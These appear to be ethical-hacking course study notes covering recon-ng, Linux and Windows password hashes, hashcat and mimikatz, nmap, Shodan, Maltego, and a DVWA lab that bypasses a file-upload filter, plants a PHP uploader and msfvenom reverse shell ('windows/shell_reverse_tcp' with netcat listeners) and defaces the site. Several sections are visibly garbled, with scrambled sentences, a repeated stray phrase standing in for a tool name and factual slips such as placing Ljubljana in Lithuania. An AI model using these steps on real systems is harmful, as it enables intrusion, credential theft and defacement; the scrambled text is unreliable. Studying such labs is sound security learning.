Welcome to my study notes for the UTN CEH course and ethical hacking in general; I hope you find them useful for your studies and practice. Each of these writings originates, in principle, as a lab for a course module, but it does not remain merely a lab. I try to give each piece enough detail and illustrate, at least, the basic use of each tool or process and not be just a tiny document where the requested task is solved and that's it.

The idea of these writings is truly to generate documentation that will serve in the future as a reference or quick guide for when I need to consult them again. And that they can be freely shared with the community of students who need access to reference information for their studies.

On startup recon-ng we find an empty framework. The first thing we must do is install modules that enable different types of functionality in recon-ng (we can think of them as extensions or plugins).

To see the available commands we use the command help:

Using Modules

With any framework that uses modules or extensions we must know which commands are available so we can search for, install and remove modules when we no longer need them.

Searching Modules in the Marketplace

To search which modules are available for recon-ng, we have the command marketplace search, with which recon-ng will show a list of modules available to be installed:

The list of available modules is quite extensive, and we see that among the details we have path, version, status, updated.

Additionally we have two columns called D and K that indicate if the module has Dependencies (D) or if it requires a key (K), as is for example the case of shodan_ip.

Adding API keys

If the module we try to use requires an API key, we can add it to recon-ng as follows: keys add shodan_api {API_KEY}:

The added keys are stored in the file keys.db in the folder where recon-ng is installed.

Installing Modules

To be able to install modules, we have the command marketplace. To install a module, for example shodan_ip. We use the following command: marketplace install shodan_ip:

This way we leave the selected module installed.

Loading and configuring Modules

It is necessary to load the module you want to use, in this case: modules load shodan_ip. Similar to other frameworks like metasploit. In recon-ng modules have different options that we must set in order to run them. To see the required (and optional) options of the selected module we use the following command: options list:

If we run the command info, we can see the different types of options that can be set and their current values. Additionally we get a detail of which values we can set for the option SOURCE.

Setting Options

To set options we use the command options set {OPTION_NAME}, in this case the module needs that SOURCE is set. The source in our case is the target IP (obtained on shodan.io):

Running the Module

At this point we are ready to run the module, for that we use the command run:

As we can see the module performs a scan of the target and returns certain details about it. If we enter the command show ports we can see the list of ports discovered during the scan:

It is also possible to use other modules that return other types of information. For example we can install the module whois_pocs, configure it and run it:

This way we perform a simple scan using shodan to obtain open ports and then using the module whois_opcs we obtained information from whois in an additional scan.

Workspaces in Recon-ng

It is important to keep in mind that recon-ng allows us to organize our information in different workspaces or work spaces. The advantage of this is that we can have our information separated for example, by targets or clients for whom we are doing reconnaissance. This way it is very simple to have a space for example for everything related to our reconnaissance tasks for microsoft.com and in another workspace have everything related to udemy.com.

The use of workspaces is very simple as we see below:

• workspaces list lets us see all existing workspaces.

• workspaces create {WORKSPACE_NAME} allows us to create a new one.

• workspaces load {WORKSPACE_NAME} allows us to load and mark a given workspace as active.

Understanding the files passwd and shadow

Previously in Linux user credentials used to be stored directly in thepasswdfile. However, due to limitations and security reasons it now only stores account information, while the password hashes are stored in the shadow.

The file is commonly found at the following location /etc/passwd and its content is plain text. Generally read-only access is allowed since many utilities use its content to map IDs to the corresponding user accounts. Within it we can find a list of system accounts. For each account the following pieces of information are exposed: Username , Password, UID, GID, UserID Info, Home Dir, Command/Shell. Let's see what each one means and what the general structure of this file and its data looks like.

File structure /etc/passwd

We already mentioned that the passwd file stores information in plain text. That information is stored one entry per line. Each line delimits its fields using colons :.

Let's look at a diagram of the structure of each line.

Let's look at a description of what function each part serves:

1. Username: Commonly used for the login process, length between 1 and 32 characters.

2. Password: A character x that indicates that the password hash is stored in the file /etc/shadow.

3. UID (User ID): Each user is assigned a ID

Reading the file /etc/passwd

Let's see what content we get when running the command on one of our virtual machines.

we see that the results include a long list of administrative accounts, services and finally users.

Understanding the file /etc/shadow

We already mentioned that currently credentials in Linux largely reside in the /etc/passwd file, but we also mentioned that the password hash /etc/shadowof each user is stored in the file called

. Let's look in detail at the structure of this other file. /etc/passwd In the same way as in the /etc/shadow file, the data inside is also stored line by line. In fact each of the lines of this file corresponds 1 to 1 with those of the.

1. Username: John

2. The username. Encrypted Password: The encrypted password usually follows a pattern like this.

   1. $type$Salt$Hash Where the type

: Currently ignored, kept for possible future uses. /etc/passwd and /etc/shadow So far we saw how the

files are composed and how information within them is organized and encrypted.

Understanding SAM (Security Account Manager) In Windows passwords are stored in the SAM file. This file is actually a database where Windows stores passwords in hashed form. To generate these hashes Windows has used different mechanisms across versions. In particular we will focus on the following:.

LM, NT-Hash(NTLM, NTLMv1 and NTLMv2)

LM Hash (LanMan Hash)

(Advanced Encryption Standard).

1. Let's quickly see how the LM algorithm operates: Conversion:

2. All lowercase letters of the password are converted to uppercase letters. Modification:

3. Null characters (NULL) are added to the password until reaching 14 characters. Division:

The hash is generated based on the concatenation of both DES-encrypted blocks.

Considering how easily it can be cracked, LM Hash was disabled by default with the release of Windows Vista and Windows Server 2008. However, backward compatibility for legacy systems is still maintained and it can be enabled manually via a Group Policy (GPO). .

this link As we can see the hashes generated for each password in LM format areidentical after conversion

, this is due to the first step performed by the algorithm, the conversion from lowercase to uppercase. If we look at the resulting hashes in NTLM format, we see that they are different for each password. Let's see how easy it is to crack that hash using a tool like.

hashcat -m 3000 -a 3 hash

Inside the VM it took about 10 minutes to crack the password:

As we see the process of cracking LM hashes is relatively simple and fast.

NT Hash (NTLM, NTLMv1, NTLMv2)

Currently Windows uses a hashing mechanism known as NT Hash or NTLM Hash. There are several versions of this hash that have improved its security over time. Let's quickly look at the main characteristics of each version.

NTLM Protocol The NTLM protocol is a Challenge-Response type system which uses the exchange of 3 messages to authenticate the client and an optional fourth message for the integrity of the exchange. The hash has a length of 128 bits and works for both local accounts and Active Directory domain accounts.

NT Hash - NTLMv1

The algorithm for this protocol is quite simple for hash generation, and makes use of both types of hashes: LM Hash and NT Hash. This version 1 of NTLM is already deprecated and is currently maintained for backward compatibility with old systems.

The algorithm for this version of NTLM is quite simple to understand at a high level:

1. Let's quickly see how the LM algorithm operates: The password is converted to Unicode (UTF-16-LE).

2. All lowercase letters of the password are converted to uppercase letters. For each character a 0 (zero byte) is added

3. Hashing: Finally the MD4 algorithm is applied to the result of the previous process.

The specific algorithm can be consulted on Wikipedia, but for reference it looks like this:

Let's see how we can crack this new hash using Let's see how easy it is to crack that hash using a tool like and an example hash.

This time it took hashcat about 5 minutes to crack the hash.

As we can see, the cracking process for the NTLMv1 version is also relatively simple and fast.

NT Hash - NTLMv2

Version 2 of NTLM continues to use the NTLM challenge-response format protocol challenge-response that we saw before, but incorporates security and cryptographic improvements to make it more secure and replace NTLMv1. It also incorporates the use of HMAC-MD5 as the hashing algorithm and includes the domain name as a variable in the authentication process.

1. Negotiation: The 8-byte challenge is generated and issued by the server.

2. Response: The following are generated 2 blocks of 16 bytes with HMAC-MD5 hashes as a response to the challenge. These response blocks also include a challenge generated on the client side, the password hash (HMAC-MD5) and other identifying information may be included.

The resulting hash can be seen in the following example obtained from hashcat's hash page:

The algorithm can be seen in detail in the Wikipedia article, which provides additional information.

Extracting hashes from SAM with Mimikatz

So far we have seen the different ways passwords are handled in Windows. To avoid ending the lab without learning a tool that allows us to interact with these hashes stored in SAM, let's see how we can extract these hashes from a Windows host using mimikatz and then crack them using Let's see how easy it is to crack that hash using a tool like. However, we will not go into detail on how to use mimikatz itself; rather we will quickly use it to dump the hashes. I may cover the use of mimikatz in another write-up in the future, since it is a very interesting tool.

The first step is to obtain a copy of the SAM file, for which we will use the Powershell terminal (as Admin) and copy the SAM and SYSTEM files to our working folder.

We should have something similar to this after performing that process:

Now we need to open a console, ideally as administrator, and navigate to the folder where we have our export and mimikatz.

The next step is to run mimikatz from the Windows terminal (PowerShell):

Now we must tell mimikatz that we want to extract the SAM file hashes and for that we must use the following command:

As we can see, mimikatz extracts the hashes present in the SAM database:

Finally we will again use our faithful friend Let's see how easy it is to crack that hash using a tool like to try to crack the password of the administrator. As we can see the hash is in NTLM format.

Hashcat again takes a few minutes to crack the hash.

End of the lab

Up to this point we have seen how password handling works in both Linux and Windows and how we can crack different types of hashes using mimikatz and Let's see how easy it is to crack that hash using a tool like. It is worth mentioning that there is another authentication protocol we have not seen in this lab called Kerberos which is commonly used for authentication against domains such as Active Directory.

It has been an extensive lab that has allowed me to study a lot about the topics covered, mainly about how authentication works in Windows, which I was not very familiar with.

In this mini-practice we will see how to use Shodan to locate servers that have certain ports open. For this example we are interested in finding the ports 22 and 23 open. Then we will use nmap to confirm that those servers indeed have both ports open.

Locating servers with ports 22, 23 open.

Shodan allows us to perform searches both from its website and from the terminal using an API access key. In this case we will quickly use the web version, using the search. Which we will refine with the use of filters, in this case the port filter called port:.

We can use this filter in the following way:

This search with shodan we will perform to find the targets for this practice, it is enough to select from the list of results offered by shodan the IP addresses. Those IP addresses we will use next to confirm that the open ports for each target reported by shodan are indeed open. For that confirmation we will use the tool nmap.

Scanning targets with nmap

For scanning I will use nmap as a tool, it comes preinstalled in distributions like .

Port 22

As a first example I will use the target 35.199.79.95 when scanning it with nmap we see that that server has port 22 open. For this we will use nmap with a series of switches or flags that allow us to refine the type of scan, speed and port.

Once the scan is completed we see that we obtain confirmation that the target has port 22 open as had been reported by the search we performed in shodan. If we look closely at the scan result, we see that nmap returns quite a bit of additional information.

Port 23

Now let's search for a target that has port 23 open, for which we refine our search in shodan with the filter port:23, alternatively we can search directly by the service name, telnet.

Once the target is chosen we proceed to scan it with nmap to confirm that indeed the port 23 is open. In my case I chose 67.201.141.136 as the target:

As we can see in the results the scan confirms that port 23 is open. In this particular case port 21 is also open. In this way we saw how to locate servers with certain ports open and how using nmap we can verify that they are indeed open.

Intro: Different types of scans with Nmap

In this practical exercise we will see how to use nmap to perform different types of scans through which we will obtain different details about our target. For this exercise I will use a local lab I have created for Active Directory practices as the target. This lab runs in VMware locally and consists of the following machines:

This lab is intended to practice certain vulnerabilities of various types, some of them detailed below:

With this in mind it should help us obtain information through the different types of scans using Nmap that we will see in this exercise.

Part 1: Basic Scans.

In this first part of the practical we will see the simplest scans we can perform with nmap.

Pinging with Nmap.

The first thing we can try is how to ping our target. For now let's start with a single target IP, that of the domain controller.

To do a simple scan of a host with nmap we can use the following switch -sn, it returns several details about the target besides informing us if the host is up, such as latency and the host's MAC address.

The full command is as follows:

With this simple scan we obtained the following information about our target:

Detecting the Operating System.

To detect the target's operating system we can use the following nmap switch: -O. Which gives us the following output in the console:

The full command looks like this:

As we can see this scan not only tries to detect the OS (OS fingerprinting), but also runs some additional analyses such as detection of common ports and detection of services running on each port.

In this case we see that it was not possible to detect the OS correctly, possibly due to some of the settings I have made in the local lab. It is important to know that we have an alternative switch to try to detect the OS more aggressively: --osscan-guess .

Let's see what the output looks like when it manages to detect it correctly:

We also see that it includes the data we saw in the previous scan.

Scanning specific ports.

To scan certain ports we can use the switch -p which allows us to specify a series of specific ports to scan.

The command looks like this:

This way we can scan the desired ports.

If we want to scan a particular range of ports we can do it as follows:

Scanning all ports (65535).

If instead we want to scan all ports we can do it as follows, using the switch -p-.

The command looks like this:

Version Scan.

To perform a scan that helps us identify the versions of the services running on the target we can use the following switch -sV.

The command looks like this:

TCP/IP Full Open Scan

If we want to perform a fully open scan, we can use the switch -sT. In this type of scan it generally ensures a response since the session is initiated in full (SYN, SYN+ACK, ACK, RST).

To perform this scan the command is as follows:

Stealth Scan (Half-open)

In many cases we need to perform scans without alerting or triggering detections on the target side. For these cases nmap has the switch -sS. In this type of scan the session does not complete correctly, and only the packets SYC, SYNC+ACK and RST are used. When the target responds, the client instead of responding with ACK responds directly with RST.

To run this type of scan the command looks like this:

Scan machines on the network

If we want to get an overview of the machines that are active on the network we are scanning we can use the switch -sP. It may take some time to finish depending on how extensive our network is. In this case the target lab is quite small.

We can use the command like this:

Note that in this case we are passing part of the IP, and indicate the last value as * so that nmap automatically scans all the machines that are part of the same subnet.

Alternatively we can use the switches -PS (SYN Ping) or -PR (ARP Scan) which return results like these:

For the moment we will not explain the use of the additional switches/flags that you can see in the previous image. We will cover those later in this exercise.

Scan with Default scripts

Nmap includes scripts (NSE) that allow us to indicate if during the scan we also want nmap to try to run the scripts it comes with. These scripts test common vulnerabilities that can provide good information about the target and about how to exploit them to gain access. This is done using the switch -sC.

The command for this type of scan is the following:

We see that the results we obtain include a lot of information about the domain controller (in this case) scanned. These results vary depending on which target we are scanning and which vulnerabilities nmap can detect for each particular case.

Part 2: Multiple scans.

In this part of the practical we will see some more advanced scans and begin to use several switches or flags at the same time in our commands.

Let's say I want to quickly obtain all the information we saw in the individual scans, to have an overall view of the target as soon as possible. Normally when I run a scan with nmap for a lab I start keeping the following in mind:

• Types of data I need to obtain

• Types of data I would like to obtain

• How quickly I want to obtain the results

Usually in practice labs or Capture The Flag type challenges, I use the following set of nmap switches or flags:

As we can see in that previous line, there are several new switches or flags that we are passing to nmap that we have not seen in this exercise yet. Let's see one by one what function they perform.

This type of scan usually results in extensive output in the console, so it's a good idea to save it directly to a file to consult when necessary.

The result of this scan in its entirety can be seen in the following block, since it does not warrant capturing it entirely in images:

In this way we saw various types of scans that we can perform with nmap to obtain important information about our target. In the next section we will quickly compile all the data we managed to obtain throughout this exercise about the scanned target.

Part 3: Gathering the information.

In this part we will compile and present all the information we obtained from all the types of scans practiced.

During this exercise we saw how we can use a subset of functionalities offered by nmap to perform different types of scans on our target in order to obtain a series of details for our pentest.

This is where we finish this nmap scanning exercise; we saw how to execute different types of scans to obtain various pieces of information and learned the basic use of nmap.

On this occasion we are going to do a scan with the tool called FOCA (Fingerprinting Organizations with Collected Archives).

For this practice I will use www.globant.com as the initial target to learn a bit about FOCA and its use. Then we will use some other target to see cases where there is metadata exposed.

SolarWinds Network Topology Mapper

For this lab we will see how to create a diagram of a network, using NTM to perform a network topology scan.

Getting to know NTM

SolarWinds NTM allows us to perform a scan through which we can discover the elements that make up a target network and, based on the IPs we use, automatically generate a diagram of that network.

When starting NTM we see a kind of wizard where we can start our first scan. The wizard offers us several options to configure: provide credentials, IP ranges, domains, IPv6 addresses, etc.

In our case we want to perform a basic scan so in the Network Selection step I will define a series of IPs obtained through Shodan.io. Those IPs belong to the University of Ljubljana in Lithuania.

If we advance through the wizard we will have the possibility to define a name for our scan; under that option we also see an option to ignore network nodes that only respond to ping (ICMP) and not to SNMP/WMI:

If we press next we reach the scheduling part where we can configure our scan to run immediately or on a certain frequency that we can define manually.

In this case we will run the scan immediately:

By clicking next we will see that the last stage of the wizard is a summary of all the settings we configured in the different steps. We also see a button called discovery that finally allows us to start the scanning process:

Once the scan begins we see that a new window opens with its current progress:

Once the scan finishes, we can see in the left panel the lists of nodes that were detected:

We can use these nodes to start building our diagram; just drag them onto the blank map and they will be added:

As we can see, the scan of the IPs we defined really did not serve to automatically generate a diagram for us.

Defining a target to obtain an automatic network diagram

Let's see if we can find some target IP that allows us to see how NTM automatically generates a diagram of the network nodes after scanning the target. For this we will use our local network as an example:

As we can observe, this time we obtain 8 network nodes and a subnet as a result of our scan. If we drag the nodes onto the map we see that this time the connection lines are indeed generated. From each node we can obtain its IP address, which will allow us in the future to use other tools and obtain additional information about each node.

NTM offers us different ways to organize our network map using the options listed below the node list in the section called Map Layouts. We can also perform different actions on each node. For this we can right-click any node and we will see the available options:

In this case we see that we can make remote desktop connections, TraceRoute, Ping and Telnet.

Collecting the results

Through this lab we obtained the following data:

• The subnet 192.168.1.0/24 contains the following network nodes from which we obtained the following IP addresses:

  • 192.168.1.34

  • 192.168.1.34

This information collection allows us to have a more detailed idea of the target network and obtaining the IPs will allow us to perform different types of scans in the future using, for example, nmap to identify open ports and running services.

In this exercise we will use Maltego in its free version (Community Edition) to understand how we can, using this tool, carry out a footprinting of a target website.

Installing Transforms

In Maltego the "Modules" are called Transforms each of them provides functionalities and various types of scans that we can use.

To install transforms, Maltego has a section called transform hub:

The hub is a kind of store or market where we can findtransforms paid, free and some that offer free trials. We have filters to refine our search. In this particular case we will use all free transforms to do our web reconnaissance exercise.

In my case I will use the following free transforms:

The installation of the transforms is simple, just click each one and choose the installoption. Then a window will open to begin the installation.

Some transforms like the one from Shodan, require an API Key to function and will ask for it during installation:

Web reconnaissance with Maltego

The objective of this exercise is to generate a web reconnaissance using Maltego and the transforms that we installed previously.

Creating a new scan

To start we generate a new graph from the Maltego menu:

Once created we see that we have a sort of canvas empty where we will be able to organize the elements of our scan. These elements in Maltego are called Entities. We can see a list of each one in the panel on the left of our canvas, differentiated by categories.

Defining the Domain (Entities)

The Entities allow us to place in the canvas the different types of devices, events, infrastructures, locations, Personal, etc.

To begin our scan, we look in the list of entities for the entity called Domain:

To add our entity to the canvas, just drag and drop it onto it. By default this entity points to paterva.com. We need to adjust that value and point it to our target. For that we have 2 ways:

• Option 1: Double click on the text of the entity and change the value to the target domain:

In my case I will use as target an online news website:

• https://semanarionuestragente.com/

Performing the first Manual scan

In Maltego each entity offers us various types of scan (they are actually also called transforms). These are enabled by the transforms that we have installed. Each entity can contain different types of scans available according to its type. To see the scans available, we can right click on the entity:

We see that the contextual menu that unfolds is called Run Transforms. It shows us each transform installed, we can click on one in particular or we can click on All Transforms to see the complete list of available options:

We will start by doing a scan of the type whois. We can use the search bar of the contextual menu to refine the list and for example see the scans of type whois that are available:

In this case we will try the transform (scan) called to DNS - NS (Name Server). By click it the selected scan/transform is executed. We see that after a moment new entities appear in our 2 . We can also see that each canvastransform/scan generates a log when executed that is shown in the output window below the In this way we see that we obtain both canvas:

Name Servers that are linked to our target. These new entities allow us to run additional. Let's see which are available for scans ns69.domaincontrol.com Let's try running the:

called transform To Domains [Sharing this NS] and when running it we see that it updates our with all the domains that also use that same canvas Name Server We can already get an idea of Maltego's potential to do reconnaissance of our targets.:

Let's take for our next scan

jamibgoode.com and run the To Email Address [from whois info] transform To Domains [Sharing this NS] We see that in this way we manage to list the email that is specified in the:

records for that domain. In this way we can begin to obtain information about our target, but Maltego also offers us another automated way to perform scans of whois using what is called footprinting machines Using Machines for Automatic Footprinting.

Maltego provides us with different

that are a kind of Using Machines for Automatic Footprinting pre-set scans that we can run automatically for the target domain we have defined. Let's see how we can use to do Using Machines for Automatic Footprinting , this time for the domain footprintingkimballoon.com First we locate the:

machine that we want to run, for this exercise we will use the one called Footprint L1 . Justclick click on the desired machine to run it:

After running the that we want to run, for this exercise we will use the one called, in the upper right of the Maltego screen we see the result of the scans/transforms executed by that that we want to run, for this exercise we will use the one called. And when seeing the canvas we see that we have multiple new entities, each of which continues providing us with additional information for our footprinting:

We see that in this case the footprinting performed generates in our canvas a considerable number of new entities of varied types. Each of which allows us to continue using transforms additional to try to obtain information and additional details that we can then collect to have as complete a picture as possible of our target.

As we can observe Maltego's power is considerable and the ease of use it offers makes it a formidable tool for our footprinting and reconnaissance.

During this simple exercise we saw some of the functionalities that Maltego offers, certainly there are many more to discover, learn and use. I hope this text is useful and helps to begin exploring this powerful tool.

What is SYN Flooding or SYN Flood?

The idea behind the SYN flood attack is to saturate our target by sending packets that have only the SYN flag enabled, without caring about the server's response. Knowing the 3-way handshake mechanism of the TCP protocol we know that normally a request SYN, is answered by the server with SYN-ACK for the client to finally respond with

What does Session Hijacking consist of?

Session Hijacking or session seizure consists of intercepting the communication between two hosts with the intent of obtaining the role of an authenticated user on a given target. Normally this practice is usually carried out in a passive or active and with attacks such asMITM(Man-in-the-middle)

Steganography

In this mini lab we will see how we can hide information inside other files and we will see the process of extracting this hidden information. With the use of steganography, we can hide information inside another file that can then be distributed regardless of being seen by third parties. Its hidden content is visible only to those who are aware it exists and know how to extract it. Generally this hidden content is also encrypted so that a passphrase is required to extract it.

NTFS (New Technology File System)

NTFS is a proprietary Microsoft file system and was introduced as a replacement for earlier file systems such as FAT (File Allocation Table) and HPFS (High Performance File System) and incorporates technical improvements over these. Among some of the advantages NTFS it includes improved metadata support, improvements in disk space management, performance enhancements, an improved security system and a file encryption system called EFS (Encrypting File System).

Basic Use of Wireshark

WiresharkWireshark is the most widely used network protocol analyzer in the world. It allows you to see what is happening on the network in detail and is the standard in many commercial and non-profit companies, government agencies, and educational institutions. Wireshark is the continuation of a project started by Gerald Combs in 1998 called Ethereal.

When opening Wireshark we will see a screen similar to the following; below we will review the most important controls that we will use from now on.

Nessus

What is Website Defacement?

The Website Defacement consists of attacking a website with the objective of changing its appearance. Normally the homepage is replaced by some message indicating that it was compromised. We can think of this type of attack as a kind of vandalism like the graffiti of protest on the fronts of police stations or on the windows of shopping centers.

Many times this type of attack is intended to spread a message of a political or protest nature, in other cases the goal is to impact the website's reputation and in other cases it is done simply so the attacker can boast that they hacked the site in question.

Some of the most famous websites in the world have been victims of this type of attack at some point. In 2012 Google Romania was hacked and every user in Romania who tried to access the search engine was presented with a page warning that they had been hacked. It is noteworthy that it is suspected this attack actually lasted at least 5 days until they managed to revert the changes within a few hours after detecting it. In 2018 a medical information and patient survey website managed by the National Health Service of the United Kingdom, was also a victim of this type of attack. During that time anyone trying to access the website could see the defacement message: "Hacked by AnoaGhost".

In 2019 at least 15 thousand websites in Georgia (the European country) were hacked to carry out a massive defacement attack and eventually those sites were taken offline by the attackers. Among these sites were government sites, banks, news outlets and television networks.

It is worth noting that to carry out this type of attack, various techniques are used to exploit vulnerabilities such as XSS, SQL Injection, CSRF, DNS Hijacking, etc.

That is to say the attack vectors that can be used to gain control of the website actually depend on the vulnerabilities present in the website being targeted for Defacement.

Creating a lab to practice Web Defacement

We will now see how we can put this type of attack into practice using a vulnerable web application on a virtual machine. To set up this lab we will use the following:

• Windows 10 VM: This VM will be responsible for serving our vulnerable application. You can use Linux/OSx if you prefer.

• XAMPP: It will allow us to quickly install our vulnerable web application.

Installing XAMPP

The installation of XAMPP is quite simple, just run the installer and practically click Next with the default values until the installation begins.

In my case I will choose to install everything in English, in your case you can choose another language in the next installation step:

Once the desired settings are selected, the installer will inform us that everything is ready to begin the installation:

When the installation begins we will see a screen similar to this:

Once the installation is complete, check the checkbox so the XAMPP control panel opens:

When the control panel of XAMPP opens, we only need to click the Start button for the Apache and MySQL. Once the initialization of these options is complete we will see the following:

In some cases the Windows Firewall may ask for confirmation to grant access to Apache and MySQL. Be sure to do so if that confirmation appears.

With this we already have our XAMPP stack ready to load our vulnerable web application and begin our practice. Next we will see how to configure DVWA to be served with XAMPP and so we can access this app.

Installing DVWA

Now that we have XAMPP configured, the next step is to install our vulnerable web app so that it can be accessed and eventually attacked for our Web Defacement practice. The first thing we need to do is download DVWA and unzip the folder on the Windows 10 VM desktop (or wherever you prefer).

In my case I will choose to rename this folder from its original name DVWA-master to simply DVWA. I do this because the name, whatever we choose, will be the one we use to access this Web Application from the URL.

Once the folder is ready, we must move or copy it into the subdirectory called htdocs inside the installation folder of XAMPP.. In my case I chose to install XAMPP in the following path C:\xampp and then inside I copied the folder DVWA into htdocs. As shown in the image below:

The next step is to modify the configuration file of DVWA so that it can connect to the database MySQL that was configured by XAMPP. For this we enter the directory DVWA, then the subdirectory called config and create a copy of the file named config.inc.php.dist and rename the copy as config.inc.php. Once this is ready, open that file with Notepad or your editor of choice and we will see the following:

The only thing we need to change in this file is the DB username and password to the following:

• db_user: root

• db_password: leave it empty.

The file should look like in the following image:

When finished save the changes and we are ready to open our web app in the browser. To do this open your browser and navigate to the following URL: localhost/DVWA/setup.php:

We will see that the application will load by default the page to set up the database. Once on this page we only need to click the button called Create/Reset Database located at the bottom of the page and after a moment we will see the following:

If everything went well, the application will automatically redirect us to the app's login form:

Once inside the app, we will configure the security level to medium and apply the changes. DVWA allows us to configure different security levels to practice various types of attacks simulating more or less vulnerable applications. In this case we will use the Medium level, just select it in DVWA Security -> Medium and click the Submit button. Once done we will see the confirmation message below, as shown in the following image:

With all this configured, we are ready to see how to compromise this app to achieve our objective of practicing Web Defacement.

Practicing Website Defacing

The Tools

For our defacement practice, we will use the following tools. Make sure to download them on your attack machine and have Burp installed. In my case I will use Kali which already comes with Burp Suite Community installed. I should clarify that I had never tried to compromise this web application before, therefore this write-up may be quite long since I will document every process I try to follow to hack it.

• Tools we will use for the Defacement:

  • Burp Suite []: To analyze the requests generated from/to the vulnerable application. We will even use Burp to bypass certain security mechanisms of the application in order to obtain the access necessary to do the defacement.

  • msfvenom: We will create a payload that gives us initial access to the server, from which we can eventually perform the defacement.

Testing possible vulnerabilities in File Uploads

The first thing we will do is open Burp to use its integrated browser and check that we have access to the web we set up with XAMPP. I will do all this from VM with Kali. The idea is to review the file upload module that DVWA has and try to bypass its protections, to be able to upload a payload that gives us initial access to this server where the app is hosted. So we open Burp, and navigate to the URL where we installed this app.

1. Once Burp Suiteis open, navigate to the following path to open the integrated browser: Proxy Tab -> Intercept Tab -> Open Browser button (both the one in the tab header and the one in the body of burp tab content do the same).

2. Navigate to the URL of our vulnerable web app: Windows-VM-IP:port/pathDVWA:

Once logged into our app, navigate to the File Upload option in the app's left menu:

The idea of our attack will be the following. We will try to bypass the upload form exposed in this part of the app, which only accepts images. And we will see how we can bypass that protection to upload our PHP form. This PHP form will give us access to eventually upload files that give us access to manipulate the server files, specifically the file that is served as the home of this web app (index.php). That index file will then be replaced by our HTML for defacement that I prepared beforehand. In this way we will perform our defacement.

To begin we will enable the interceptor in Burp Suite so that the communication between our browser in Kali and the web app can be intercepted. We are interested in knowing what type of request is sent to the server when we upload a valid image and when we try to upload a file whose extension is not allowed. We will evaluate the differences with Burp and see how we can manipulate that invalid request to convince the server that the file we are trying to upload is an image and not a PHP.

Let's see what happens in the request sent when we upload a valid image:

And we see that when clicking Forward, the request is processed and accepted by the server:

We can observe two important pieces of data in the request:

• Content-Type: image/jpeg: Which indicates that the server will interpret the file being uploaded as, in this case, an image.

• Filename="Test1.jpg": The filename and its extension.

And if we navigate to that path, we see that indeed our image file is on the server:

Let's see how the request behaves when the uploaded file contains a prohibited extension.

And when forwarding that request, we see that it is detected as invalid and rejected as expected:

We can observe the same important data in this request:

• Content-Type: application/x-php: Which indicates that the server will interpret the file being uploaded as a php.

• Filename="Test_shell.php": The filename and its extension.

With this information, we can theorize that both parameters influence when the controls (or filters) implemented to sanitize uploaded files are executed.

Obtaining Initial Access: Exploiting the File Upload

With this information we can try our first attack to attempt to upload our form and bypass this control implemented by the app. We will do it by modifying the request sent to the server when we click Upload after attaching a PHP file.

Let's review then what we will attempt:

1. We will create our own file upload form that has no protection and allows us to upload any type of file. This form will be the first file we must manage to upload, and it is the one that will open the doors to the server.

2. We will try to see how we can upload this form to the server, for which we will attack the DVWA File Upload form.

3. When uploading our form, we will intercept the request with Burp Suite and modify the Filename

Creating our unrestricted Custom File Upload

I will not go into detail on how to create this PHP form, I will leave the code I prepared below and the repository of a similar idea that helped me put everything together.

It is very possible that the upload verification mechanism used by this app can detect our PHP code as an app, despite us providing Content-Type, Filename and headers as if they were those of an image. For this reason we will try to mask our form as best as possible, while trying to keep it as small as possible.

What we will do is create a very small PHP and HTML file that simply generates an upload form with no restrictions. If we manage to upload this small form without problems, we will be closer to having the access necessary to do the defacement.

The code would look like this:

This file I will save as GIF98.php.jpg in an attempt to bypass some control that checks the uploaded file's extension. It is quite common that weak protections implemented in web apps only verify from the end of the filename to the first dot (.jpg) ignoring the second extension (.php). Sometimes this verification is done the other way around, and it is checked from left to right from the filename so it is possible we may have to change the name to GIF98.php.jpg.

We will also edit the request after clicking Upload in the app, to remove the jpg extension and leave the Filename parameter like this: Filename=GIF98.php.

The name of this form can be whatever you want, in my case I chose that one for no technical reason but it was after reviewing some resources like and , where the possibility of bypassing some protections by adding an image header to our PHP is mentioned (header):

The concept is simple: you try that the server interprets the request headers and then when it "sees" the content the first thing it finds is an instruction (header) that is normally associated with an image file. In the example above we see that this header is GIF89a, but there are also others such as GIF98 which is the one I will use in this lab.

Let's see if this idea works: In DVWA -> File Upload we will upload our form and intercept the request with Burp after uploading it.

We will modify the following if the request shows that when uploading the file its format is detected as application/x-php and not as an image:

1. We change the value of Filename=GIF98.php.jpg to Filename=GIF98.php

2. We change the value of Content-Type: application/x-php to Content-Type: image/jpeg

The request will look like this:

When forwarding the modified request we see the result:

We did it! we were able to bypass the app's protection and uploaded our own File Uploader. Let's see now if we can load it by accessing the path the app gives us in the message:

And indeed we can open our File Uploader:

We can test this form to see that indeed any file we upload, regardless of its extension, will be accepted. In this case I have already tested it and it works, so I will not cover that mini test since this write-up is already quite long.

Creating our reverse shell with msfvenom

Let's quickly see how we can create our reverse shell using msfvenom. We will not use metasploitdirectly, we will instead try to connect the reverse shell to our netcat listener in the Kali terminal.

In my case:

Now that we have our payload, we set up our listener:

With everything ready we upload our payload:

Indeed if we go to the URL where files are uploaded, we will see our payload:

Finally let's see if we can get a connection to the server by reverse shell when opening our payload:

And in our terminal we finally receive the connection:

The next step is the defacement which we will see below, for the defacement the objective is to replace index.php with our web file that we prepared for the defacement.

Before we can proceed with the defacement we must solve a small problem, the connection we receive with our reverse shell is quite unstable and the connection to the server cuts off quickly. To mitigate this problem we will try to create a second payload in exe format for the Windows platform where the app runs. The idea is that once we have the initial connection with thepayload1 , we will execute the payload2 netcat to obtain a more stable session in a

secondary listener. msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACK_VM_IP LPORT=DESIRED_PORT -f exe > payload2_name.exe

We create this second payload:

And once created we upload it with our custom upload form, as we did with the first payload. Now we will leave 2 listeners netcatrunning with , each pointing to the port selected when creating these payloads. In my case, and 2112 for the php payload2113 for the exe . We will then execute the php payload

and upon receiving the connection we will quickly execute the .exe payload to receive the other reverse shell connection which may be more stable:

Now we finally have a second more stable shell to work with. The next step, finally, is the defacement.

Performing the Website Defacement

Finally, after several processes we have initial access to the server to perform the defacement. Let’s see if we can carry it out without encountering any other obstacle. index.php The first thing is to have our HTML ready to replace the and we will serve it online using a local HTTP server started with:

python

Then we download that file to the webserver using Curl: HTML And indeed we see that we managed to upload our

for the defacement: DVWA:

Let's see if we can view the defacement by accessing the main path ofWe did it Website Defacement.

, the hardest part was learning how to bypass the file upload protections of this web app and how to generate a stable reverse shell connection that then allowed us to carry out our